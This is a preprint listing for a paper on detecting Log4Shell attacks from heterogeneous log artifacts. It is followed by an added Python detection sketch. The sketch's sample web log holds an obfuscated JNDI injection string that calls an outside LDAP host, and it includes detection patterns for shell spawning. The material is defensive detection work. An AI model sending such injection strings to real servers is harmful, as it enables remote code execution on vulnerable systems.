
Framework for Analyzing Heterogeneous Log Internal Artifacts for Remote Code Execution Detection

EasyChair Preprint 15590

9 pages
Date: December 18, 2024

Abstract

The Log4Shell vulnerability, first identified in 2021, has significantly impacted global cybersecurity, ranking among the most critical vulnerabilities ever documented. In response to this threat, patches were swiftly developed and deployed. However, in environments where the implementation of firmware patches presents challenges—such as within the Internet of Things (IoT) and Industrial Control Systems (ICS)—systems remain susceptible to Log4Shell. Consequently, in addition to addressing the root cause of the issue through patches, there is an urgent need for methodologies that can detect and proactively respond to such attacks in their early stages. This study proposes a methodology for the collection of artifacts derived from heterogeneous logs generated by firewalls, web servers, and host devices, and delineates a strategy for the detection of Log4Shell attacks utilizing these artifacts throughout the progression of such attacks. Future research will include an experimental demonstration of the proposed detection schemes, categorizing the artifacts that can be collected according to the various stages of the attack.
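The abstract describes collecting artifacts from firewall, web-server and host logs and matching them against the successive stages of a Log4Shell attack. The following Python sketch is an added example, not the paper's code: it normalises the lookup-obfuscation forms seen in web logs, tags each source's lines with a stage, and only raises a per-host verdict when the stages appear in attack order within a time window. The constructed log lines, the field names, the stage names, the five-minute window and the callback-port set are all assumptions.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample lines (not from the paper) for the three sources it names; 203.0.113.7 is a documentation address.
WEB_LOG = ['10.0.0.5 - - [18/Dec/2024:10:01:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://203.0.113.7:1389/a}"',
           '10.0.0.9 - - [18/Dec/2024:10:02:10 +0000] "GET /index HTTP/1.1" 200 88 "-" "Mozilla/5.0"']
FW_LOG = ['2024-12-18T10:01:03Z host=app01 action=allow proto=tcp dst=203.0.113.7 dport=1389 dir=out']
HOST_LOG = ['2024-12-18T10:01:04Z host=app01 parent=java child=/bin/sh']
WEB_HOST = "app01"                         # assumption: the server whose web log is being read
WINDOW = timedelta(minutes=5)              # assumption: maximum spread between the stages
CALLBACK_PORTS = {389, 636, 1099, 1389}    # LDAP/LDAPS/RMI ports a JNDI lookup would dial (assumption)
STAGES = ["lookup_injected", "outbound_callback", "child_process"]

EVASION = re.compile(r"\$\{(?:lower|upper):(\w)\}|\$\{[^{}]*:-([^{}]*)\}", re.I)
JNDI, KV = re.compile(r"\$\{\s*jndi:", re.I), re.compile(r"(\w+)=(\S+)")

def normalise(text):
    """Resolve ${lower:x}, ${upper:x} and ${...:-x} lookups until the string stops changing."""
    prev = None
    while prev != text:
        prev, text = text, EVASION.sub(lambda m: m.group(1) or m.group(2), text)
    return text

def parse_ts(line):
    m = re.search(r"\[([^\]]+)\]", line)   # Apache bracketed timestamp, otherwise a leading ISO 8601 stamp
    if m:
        return datetime.strptime(m.group(1), "%d/%b/%Y:%H:%M:%S %z")
    return datetime.strptime(line.split()[0], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

def stage_events(web, fw, host):
    """Yield (host, stage, time) artifacts; lines that match no stage are ignored."""
    for line in web:
        if JNDI.search(normalise(line)):
            yield WEB_HOST, STAGES[0], parse_ts(line)
    for line in fw:
        f = dict(KV.findall(line))
        if f.get("dir") == "out" and int(f.get("dport", 0)) in CALLBACK_PORTS:
            yield f["host"], STAGES[1], parse_ts(line)
    for line in host:
        f = dict(KV.findall(line))
        if f.get("parent") == "java" and f.get("child", "").endswith(("sh", "cmd.exe", "powershell.exe")):
            yield f["host"], STAGES[2], parse_ts(line)

def detect(web=WEB_LOG, fw=FW_LOG, host=HOST_LOG):
    """Return {host: stages reached in attack order}, anchored on the first injected lookup and bounded by WINDOW."""
    start, verdict = {}, {}
    for h, stage, ts in sorted(stage_events(web, fw, host), key=lambda e: e[2]):
        if stage == STAGES[0]:
            start.setdefault(h, ts)
        reached = verdict.setdefault(h, [])
        if h in start and ts - start[h] <= WINDOW and STAGES.index(stage) == len(reached):
            reached.append(stage)
    return {h: s for h, s in verdict.items() if s}
```

A firewall callback or a java-spawned shell on its own never produces a verdict here; the lookup artifact from the web log is the required anchor, which is what keeps the later-stage signals from firing on unrelated LDAP traffic.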

Keyphrases: Log4Shell, log analysis, remote code execution

BibTeX entry
BibTeX does not have the right entry for preprints. This is a hack for producing the correct reference:
@booklet{EasyChair:15590,
  author    = {Seung-Ju Han and Ka-Kyung Kim and Hye-Ji Lee and Ieck-Chae Euom},
  title     = {Framework for Analyzing Heterogeneous Log Internal Artifacts for Remote Code Execution Detection},
  howpublished = {EasyChair Preprint 15590},
  year      = {EasyChair, 2024}}